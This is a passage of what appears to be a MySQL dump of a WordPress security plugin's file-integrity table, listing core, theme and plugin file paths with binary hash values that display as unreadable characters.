�Q-hJ-����7�Z�m','',0,'?'),('��^�����f8��','wp-content/themes/edge/inc/upgrade-plus/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�>2��_�0�$','!Ѽ���ry���20�W�m�YQt���n�� z','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('��sxݴ�,&BHB&��','wp-content/themes/catch-flames/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��\'�0�$$�D*�','�s��ÕˢjR��|��у��r]6�','',0,'?'),('���Kr0V#Z�x&�`�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��l~O)1��<�(','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('����^[X��i�	�','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���-G;:y^\Z)�','����F�ȳ۬�2U����-��:�1��','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{����` .�','����=FL�e���c���^&��\Z|\nl��aO�','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('���u��,���;��!�','wp-content/themes/simpleshift/inc/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@����&�����j��1','�����NҊ�H1z�sq\r:s\"�K֏�h�;��','',0,'?'),('�ɔ#�j��Y�Et�XZ','wp-content/themes/wp-simple/inc/kirki/assets/css/customizer-dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�.p��=����','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('��&m��i�Ѧ]�Z�','wp-content/themes/exoplanet/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���h�jRZh6%��','��5䟟��Ӿ+J�L�![���.2l�oW�j	','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�zTc�I��J��W3','�zU)��i��YQ�;�PXꘞL�v�������','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('�	���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�@�]�FmGDs�>a��G','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-generic-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[&�Mc��=�k,�ڱ`','���r橛��#YW�E�	�B\Zh����ʤ��','',0,'?'),('�D`B�ȥ�\n�b�Ǚ','wp-content/themes/twentynineteen/sass/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ut _��vO0a','LL�Z�m��h2-s��,+�<�s!@tp�z�G','',0,'?'),('�JKW��_9&�!��X=*','wp-content/themes/catch-responsive/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��Z;\0�oH�','�+�w;3˛	h�VI:�H�.~�=s�燹','',0,'?'),('�MQ��HY�_r$K�S�','wp-content/themes/twentytwenty/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�8\\O��^����QR','����@8\Z���!��G�6��ͮe���,\0�5','',0,'?'),('�O��f��b���^�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˌ�T�&�!:����h','%�\'���v�u���[�� ʁ����#��i=�','',0,'?'),('��%*����|0����','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݫ$�\r:��](2\\X~W','ч�n���s��Mӥ�&@KC���/6���zEd�','',0,'?'),('��x~҃�k� �82�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/hint/css-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�y1�Lyh��è��','\\PC\'�� ����!m��/$2�8V#B\r�9Qmԇ','',0,'?'),('����44�鑌��&','wp-content/themes/hemingway/js/theme-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��7@���G����','�0#����*\'L��\r��\'�7�FS1M@�f�','',0,'?'),('���k�+V	^�h��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-checkbox-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��\\u�X|�Y���Ŧ','�S\\�R���+@<[��yW���U@�G+����','',0,'?'),('��V��_�>�y���\Z','wp-content/themes/newsmag/assets/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�24\rPT�\0�RA9�','��6���uʘ̭�*���[�w*���y��a','',0,'?'),('��{�]\\ֵ�	��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՒMwG��2�x͝','ݗ��|\0�[����1��1n|�m�©�O� ','',0,'?'),('��/7�\rZuD D�|�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��/���Hg��','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('���hB�SP�9�q�-','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/sections/hover.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�ܞ\\\nowX�D2','��X��\\?!eeO���q�z��ėJD�$O0','',0,'?'),('�\03�W�\'�N���|','wp-content/themes/newsmag/inc/customizer/settings/general/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�7�)�G)+du�W','g�ㅠ{\0�Ӫ�/T��T_�EHh�p�pY�','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�\Zp��Z�E�ܕ��H','wp-content/themes/wp-simple/inc/kirki/assets/js/l10n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�Sve�䤀��tQ�','����3�R�{��s�w��\r+Y~\0e�Ó=թ$','',0,'?'),('�%����e�h�+s','wp-content/themes/gambit/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x2�׳ΰ�b)�W+�','�g�����F��P��ٹV/�k헆mV�8�','',0,'?'),('�%�?������w,�','wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�8����G','-�1\"����Cg��>��O	�}�q�ŭ�?���','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�7��:\'�>8��\\t%','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IJ�k6�nE��~qeu','�A��{�\'�L���\\t7�EX�fꙁ$��','',0,'?'),('�B���gٳ��>/�y��','wp-content/themes/edge/inc/customizer/functions/color-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����S�ΜC�|�O�','�)�G�\0K$������*���i���d\0�ng�o','',0,'?'),('�E�gs��53���z�<','wp-content/themes/graphene/loop-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��74.�4>�:','W ����T+z)F�s�%c�;D��z!r�','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('�vK�u롮)�����','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/dropdown-pages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ك�A;�iY/�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('���!Q�^�2OlP�','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X����z�(\nV71�','�jP����W�#�7�f�c�����-����@','',0,'?'),('���v�Za4c��j���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m;�KG����K��','r\Z�Q���Ϙ	��8���J��a{�>Z`�xG9','',0,'?'),('��q�j���}欞�E','wp-content/themes/graphene/images/bg_g.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԉ^؛#O�5�GI��','�7\'�L�)/lZ]���`2i%(\'������`o','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('��,����SΣf!2��','wp-content/themes/simpleshift/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����G�\\�e[z��','O��E߿�i8�?��;���c�]�#�+3ڣd','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('��k���-�)�z} �','wp-content/themes/wp-simple/inc/kirki/includes/sections/class-kirki-sections-default-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�U����c�A��(��','(�PE(�v����a�M��~u5a-`��','',0,'?'),('��_�}i��3�JJ��5&','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/less.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G-�M�@�x��]','Ll\rK�:2������\Z:,��h��\"��=�ݪ','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('��%u�g��H���]G�','wp-content/themes/graphene/includes/theme-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#n7kL�6�\Zȵ�','�WF�8#��͉�Q���	Y��D�W3\Z\rU�Ah�','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�����gy_Ɣ�eb\r','wp-content/themes/newsmag/inc/components/breadcrumbs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�]Tg���\Z�!��','�m1�X^��s$�	Eh��M���WR�{��^�','',0,'?'),('�N��rזzn�|�','wp-content/themes/catch-responsive/css/jquery.sidr.light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oai��H�V�iv���',')�e�:��\rT��Gg���l/.~�~>e=$���','',0,'?'),('�O~�LȦ�\"f~|��;','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���n.�)�U\\!k�','1,����0��љLv��/\r�>%���\"����','',0,'?'),('�X!?=v��YR�ɶ#�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Љ�Р80�g�c%','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��\'�]9?�]g�$','���P�a���̬Vch�;������;l','',0,'?'),('�j�TZ$�x��L��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b���9�B]���2','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��n\'�mW8��iv��','wp-content/themes/graduate/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�v,uF�II�V�','*t����\"Gb{D}J���Z�<����g��m','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('��o��8s�P�9b','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z$���m$�,7^�a','��2dٓ�qѾQ0X݋b��$�Ƴ5#��z��`','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('���{Q�c��k�D�','wp-content/themes/exoplanet/functions/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�ln!��3.f(*��','@z�#���y��|�x����c`a�~\'�̳�\':','',0,'?'),('�� |������Y�=','wp-content/themes/newsmag/assets/sass/layout/_body.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���C��A�����0�','�iB��5��A?�����f�P��Qwc�#��&','',0,'?'),('��������I�FmB.F','wp-content/themes/hitmag/inc/kirki/assets/css/kirki-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w ED����Q�e�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\ZB�\"4�]C\Zh1','8Fb��lv�l�E�]�e�����O���\Z��','',0,'?'),('��&�O��\\|+�zC��','wp-content/themes/enigma/core/admin/admin-themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lp�Qy���I��j','�\0o+�Mac��xT\0�V44~m����zJ\\��','',0,'?'),('���%�!ڡG��&�5','wp-content/themes/twentytwenty/assets/css/editor-style-block.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������	,�R��','�j^V�:���M�䌚�0o7Y|R9߀a|��� ','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș��	','',0,'?'),('�\r��B]�e�Od�J','wp-content/themes/Endolf/404.php',0,'�Ʉ��������Û+','�Ʉ��������Û+','dܟ��eb�\Z��\r_*m��V0oB�q<���V�','',0,'?'),('� 7��S�Y�D��`��','wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�xz�r��rp�f��4b','{4�	�\"-	v]�F���*Ş( <�ߔh�É>','',0,'?'),('�!S\"����j��#R','wp-content/themes/enigma/images/flakes-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʮ1h���nBL���','gB��%�A>�7�\Z \'�K��S�U���|�','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[QTGfS\"�����','�4���4HGM�;]B���FO��d�ƴ6@�','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('�L���7k��+@(E\"�','wp-content/themes/enigma/core/menu/weblizar_nav_walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f#h�Y\\��\Z�×D','�q��H�\'��)�%3����4u�Y��_h�','',0,'?'),('�O�CGҧ�+>��^��','wp-content/themes/advance/inc/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9z˃6�IO�ܕ�;�','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('�R<�+�a�n���B+E','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/serialize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R�Mя��\0�T�','��D��~��E4^J1�g�zh�\0~�R$5g�_�','',0,'?'),('�TU�8M�DZ�z��a�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/less_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#\n���C�`fCP�','�)ee�<[��\"ۻb1��z��]�u׾�\\','',0,'?'),('�V\'�2��F�o\'�9J�6','wp-content/themes/saybusiness/template-parts/grid-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�L���3��$D_n','-H��w��*{ް�P�=ZQ������c84O�','',0,'?'),('�a�|���舑~E\ZGn�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/haml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z ���k��\n�o�','Ǒ�(8�y[��8w�����O��8$\"�����','',0,'?'),('�l���M+J��m��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�\'���\'�Q^�o�+^','!3��`DTd�k����3���Z�2�6�}','',0,'?'),('�u������%�(��','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3	�:h)�7K�<�\\N�+','',0,'?'),('�x�`��&�2f�O��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/trailingspace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e	[x�Ef�o�@�','����H�!l^����f��Ce��','',0,'?'),('�z�3����[�v�=�','wp-content/themes/graphene/images/social/squidoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MH�R�#J�3�=!V','J�6Th��<A��6��nЙ�@y|�:3$','',0,'?'),('�{m\Z��\Z&�����','wp-content/themes/wp-simple/inc/kirki/kirki/includes/settings/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-����_�G^ަA�','����#9�K��K&QJ�A�s�ȁ�G�4z#�','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B঍\0�z�6x`B','�	]����	\0On��6B;���\ZZ$�	2ЯSh','',0,'?'),('��h���)UG@�x��v	','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�8���K��PH�>H','��j\r�+Yg��1��S����t2�f��;�','',0,'?'),('���#{�^s��L','wp-content/themes/edge/assets/sticky/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�37�\r=�����n','L��\n��Ne�d\rO��)���q�M�\r�wX�','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��,X�s��NSd��� 1','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/yaml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|o�ѥ�.��n�F�(','-�驂�ۈ:}���b��T$�)\Z�j��&�Ł��','',0,'?'),('���M���w�~�����>','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��9�L��8','�쮀ܻ�3OqJ\0��i<���i<��I��','',0,'?'),('��xN/��D�,Rv��6�','wp-content/themes/city-store/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','몉*m���t��G	R','�x�1��G�$t�R^CP��9�E5�9~y','',0,'?'),('��ӰI��#3⩦¹l�','wp-content/themes/hitmag/inc/kirki/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!U%9}�\'a�@$�F��','��I�]D��.���.��]�G\0��(\0]?�','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('���/����O���k','wp-content/themes/Endolf/archive.php',0,'���5Mk��K�u��}�','���5Mk��K�u��}�','N��\Z]F�(>L�(���`\rQD?�3�����','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�60���6�k�/��','�O}���j�\\Eнe��(BL\Z$�핓1','',0,'?'),('������4�Q','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/panels/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6IT���+��8t=','�B�2��锳§�lyk(��G����','',0,'?'),('���lB�לb����','wp-content/themes/newsmag/assets/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!;��R�j�Q�/���C|','��roB���r�s��Ĭ��h\Z�i�j�SY�','',0,'?'),('�\Z��Ж�Iw>� ��','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7|�z��✮','�E�(�\ru��\nP18dy��h�R�����k�q','',0,'?'),('�X���W� r��.V','wp-content/themes/simpleshift/assets/images/preview/purplebridge.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1(e~���p#6����','G�N!����%�U��/��������dn��','',0,'?'),('�r��Ɇ�~tW�{N','wp-content/themes/catch-responsive/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�����T�),�\"x','^qS�m	�Rו��������	��F���p��g�','',0,'?'),('� p��2�;�q[C','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z,624w�_&�','��a�.h�\0�� ��{Q���û�in&T�T��','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�5�V\Z\r��2���\'�#�','wp-content/themes/chronus/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' <c��P����_ū�','`���A�.�2�A�1��`�����	�]���-','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�SRý+���UE�s>�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[���\nSO2}','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('�U�gy��X���jێh','wp-content/themes/graphene/images/social/foursquare.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yc�I��������','0�j�=��b)\\����x��J�ܔ�iP;�5�','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�^ǃ�#���_t','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�c�